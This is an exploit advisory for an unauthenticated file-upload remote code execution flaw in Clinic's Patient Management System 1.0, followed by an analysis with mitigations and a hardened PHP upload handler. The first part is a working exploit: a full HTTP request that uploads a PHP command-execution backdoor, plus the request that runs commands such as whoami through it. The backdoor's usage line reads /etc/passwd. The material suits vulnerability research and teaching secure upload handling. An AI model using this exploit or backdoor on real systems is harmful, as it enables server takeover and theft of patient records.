Clinic's Patient Management System 1.0 - Unauthenticated RCE

Exploit Author: Oğulcan Hami Gül Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2024-02-05
# Exploit Title: Clinic's Patient Management System 1.0 - Unauthenticated RCE
# Date: 07.10.2023
# Exploit Author: Oğulcan Hami Gül
# Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code
# Software Link: https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10

## Unauthenticated users can reach /pms/users.php and, in place of a profile picture image, upload a malicious PHP file; no login of any kind is required.

POST /pms/users.php HTTP/1.1
Host: 192.168.1.36
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------421755697017784551042596452367
Content-Length: 1054
Origin: http://192.168.1.36
Connection: close
Referer: http://192.168.1.36/pms/users.php
Upgrade-Insecure-Requests: 1

-----------------------------421755697017784551042596452367
Content-Disposition: form-data; name="display_name"

sefa7
-----------------------------421755697017784551042596452367
Content-Disposition: form-data; name="user_name"

sefa7
-----------------------------421755697017784551042596452367
Content-Disposition: form-data; name="password"

sefa7
-----------------------------421755697017784551042596452367
Content-Disposition: form-data; name="profile_picture"; filename="simple-backdoor.php"
Content-Type: application/x-php

<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<!--    http://michaeldaw.org   2006    -->

-----------------------------421755697017784551042596452367
Content-Disposition: form-data; name="save_user"


-----------------------------421755697017784551042596452367--


## After the upload request is sent, the application prefixes the original filename with a number (1696676940 in this test; the value is a Unix timestamp that matches the exploit date, so it is predictable rather than random) and stores the file under /pms/user_images/, where it can be requested without any authentication.

## With the request http://192.168.1.36/pms/user_images/1696676940simple-backdoor.php?cmd=whoami the attacker can execute arbitrary commands on the application server with the privileges of the web server process.


Exploiting Unauthenticated Remote Code Execution in Clinic's Patient Management System 1.0

Security flaws in healthcare software carry real consequences when they let an attacker execute code without authenticating. One such flaw exists in Clinic's Patient Management System 1.0, a PHP/PDO application distributed through sourcecodester.com as a free source-code download for managing patient records. The application contains an unauthenticated Remote Code Execution (RCE) vulnerability: an anonymous user can upload a PHP file through the profile-picture field of the user form and then run operating-system commands with the privileges of the web server process.

Understanding the Vulnerability

The flaw is in the /pms/users.php endpoint, which accepts the new-user form, including the profile_picture upload, without a login. The handler does not validate the uploaded file's type or extension and keeps the client-supplied filename, so a file named simple-backdoor.php is stored as-is (apart from a numeric prefix) in a directory that the web server serves with PHP execution enabled.

Here is the malicious payload used in the exploit (the same simple-backdoor.php that appears in the captured request above):

    <?php
    if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
    }
    ?>

This backdoor looks for a cmd parameter in the request. When one is present it runs the value through system() and returns the output inside <pre> tags. Because it reads $_REQUEST, the parameter can arrive in the query string, in a POST body or as a cookie. Any shell command the web server user can run is available, such as whoami, ls or cat /etc/passwd.

Exploit Workflow: Step-by-Step

Attackers follow a straightforward process to exploit this vulnerability:

  • Access the endpoint: The attacker sends requests to http://192.168.1.36/pms/users.php without any session or credentials.
  • Send the malicious upload: A multipart/form-data POST carries the new-user fields plus a profile_picture part with filename="simple-backdoor.php" and Content-Type: application/x-php; both values are chosen by the attacker, and the server trusts them.
  • Server-side behavior: The application prefixes the filename with a number (1696676940 in the original test, a Unix timestamp that matches the exploit date, so it is not random) and writes the file to /pms/user_images/ as 1696676940simple-backdoor.php.
  • Execute the payload: Requesting http://192.168.1.36/pms/user_images/1696676940simple-backdoor.php?cmd=whoami runs whoami on the server and returns its output in the response.

Why This is Critical

Unlike typical vulnerabilities that require authentication or specific user privileges, this RCE is unauthenticated. This means:

  • Anyone who can reach the application over the network can exploit the flaw; no account is needed.
  • The attacker obtains command execution as the web server's user without credentials, and from there can read the application's database configuration and patient data.
  • The uploaded script stays on disk and keeps working until someone finds and removes it, giving persistent access.
  • Compromised systems can be used as pivot points for further attacks on the clinic's network.

For a clinic’s patient management system, this is especially dangerous. Unauthorized access to patient data, system configuration files, or even the ability to manipulate records could lead to data breaches, ransomware deployment, or denial-of-service attacks.

Technical Root Causes

The vulnerability stems from missing access control combined with an upload handler that trusts everything the client sends. Key failures include:

| Issue | Explanation |
| --- | --- |
| No authentication on the endpoint | /pms/users.php processes the save_user form for anonymous clients, so user creation and the upload it carries are open to everyone. |
| No server-side content validation | The client-supplied Content-Type (application/x-php in the exploit) is accepted at face value; the file bytes are never inspected with finfo or getimagesize. |
| No extension allowlist | The client filename is kept, so its .php extension survives into the stored name. |
| Predictable name in an executable directory | The only change to the name is a numeric prefix (a Unix timestamp in the test), and the file lands in /pms/user_images/, which the web server serves with PHP execution enabled. |

Note that the system() call seen in the exploit belongs to the attacker's uploaded backdoor, not to the application; it is the payload, not the root cause, and filtering shell commands in the application would not fix anything.

Security Best Practices for Developers

Developers of web applications, especially in sensitive domains like healthcare, must implement strict security controls. Here are the mitigations that address this flaw:

  • File type restriction: Accept only image formats (JPEG, PNG, GIF) identified from the file content, and derive the stored extension from that detected type rather than from the client filename.
  • Content-type verification: The Content-Type of a multipart part is set by the client and proves nothing; verify on the server with finfo and getimagesize, and reject anything the image parser does not accept.
  • File storage isolation: Store uploads outside the document root, or in a directory where PHP execution is disabled at the web server (for Apache, php_flag engine off or a FilesMatch rule denying .php requests in that directory; for nginx, a location block that never passes the path to PHP-FPM).
  • Unpredictable, server-generated names: Never reuse the client filename; a timestamp prefix such as 1696676940 is guessable to within a few seconds of the upload.
  • Authentication requirement: Restrict user creation and the upload it carries to authenticated administrators.

Improved Secure Code Example

A corrected version of the upload handler needs the following safeguards:

  • Requires an authenticated session before processing the form.
  • Detects the file type from its content (finfo and getimagesize) and checks it against an image allowlist, ignoring the client-supplied Content-Type and filename.
  • Derives the extension from the detected type and generates the name with random_bytes(); uniqid() is derived from the microsecond clock and is as guessable as the timestamp prefix the application uses today.
  • Stores files outside the document root, or in a directory where the web server never executes PHP, so a stored script cannot be invoked even if every other check fails.
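A hardened handler with those properties, written here as an added example rather than the project's own code. The session key user_id, the storage path under private_uploads, the size limit and the persistence step are assumptions; the field name profile_picture comes from the captured request.

```php
<?php
// upload_profile_picture.php: added example of a hardened replacement for the
// profile-picture upload in users.php. Not the project's code; the session key,
// storage path and size limit are assumptions.
declare(strict_types=1);
session_start();

const MAX_BYTES = 2 * 1024 * 1024;
// Storage directory OUTSIDE the document root: nothing here can be requested
// directly, so even a script that slipped through every check would never run.
const STORE_DIR = __DIR__ . '/../private_uploads/user_images';
// Allowlist keyed by the MIME type detected from the file CONTENT, never by the
// client's Content-Type header or filename. The extension is taken from here.
const ALLOWED = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

function fail(int $status, string $msg): never {
    http_response_code($status);
    header('Content-Type: text/plain');
    exit($msg);
}

// 1. Authentication: the original endpoint accepted anonymous uploads.
if (empty($_SESSION['user_id'])) {
    fail(401, 'login required');
}

// 2. Upload sanity: the file must come from this request's upload, not a path
//    the script was tricked into reading, and must respect the size limit.
$f = $_FILES['profile_picture'] ?? null;
if ($f === null || $f['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($f['tmp_name'])) {
    fail(400, 'no file uploaded');
}
if ($f['size'] > MAX_BYTES) {
    fail(413, 'file too large');
}

// 3. Content sniffing: finfo reads the magic bytes and getimagesize must agree
//    and actually parse the image. A PHP script fails both; so does a PHP script
//    with a fake image header that the parser cannot decode.
$mime = (new finfo(FILEINFO_MIME_TYPE))->file($f['tmp_name']);
$info = @getimagesize($f['tmp_name']);
if ($mime === false || !isset(ALLOWED[$mime]) || $info === false || $info['mime'] !== $mime) {
    fail(415, 'only JPEG, PNG or GIF images are accepted');
}

// 4. Server-generated name: the client filename is never used and the extension
//    comes from the detected type. random_bytes() is unpredictable; a time() or
//    uniqid() prefix is not.
$name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];

if (!is_dir(STORE_DIR) && !mkdir(STORE_DIR, 0750, true)) {
    fail(500, 'storage unavailable');
}
$dest = STORE_DIR . '/' . $name;
if (!move_uploaded_file($f['tmp_name'], $dest)) {
    fail(500, 'could not store file');
}
chmod($dest, 0640);   // readable by the server process, never executable

// 5. Persist the generated name against the user (hypothetical data-access call;
//    the real application would use its PDO connection here).
// save_profile_picture_name((int) $_SESSION['user_id'], $name);

header('Content-Type: application/json');
echo json_encode(['stored' => $name]);
```

Because the images no longer live under the document root, a small serving script has to read the stored name from the users table, readfile() the file and set Content-Type from the detected type it recorded, rather than from anything in the URL. If the images must stay under /pms/user_images/ for compatibility, the same protection comes from the web server configuration described above (PHP engine off for that directory), and the content checks in steps 3 and 4 still apply.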

Conclusion

The Clinic's Patient Management System 1.0 vulnerability is a reminder that open-source software, even when free and widely available, must be scrutinized for security flaws before it is put in front of patient data. The combination of an unauthenticated endpoint, an upload handler that trusts the client's filename and Content-Type, and an upload directory that executes PHP makes remote code execution a single HTTP request away.

Organizations running this system should take the endpoint offline or apply the controls above, then inspect /pms/user_images/ for anything that is not an image: a stored .php file there means the flaw has already been exploited and the host should be treated as compromised. Developers must prioritize secure upload handling, especially in healthcare, where a single flaw of this kind exposes patient privacy and the operation of the clinic that depends on the system.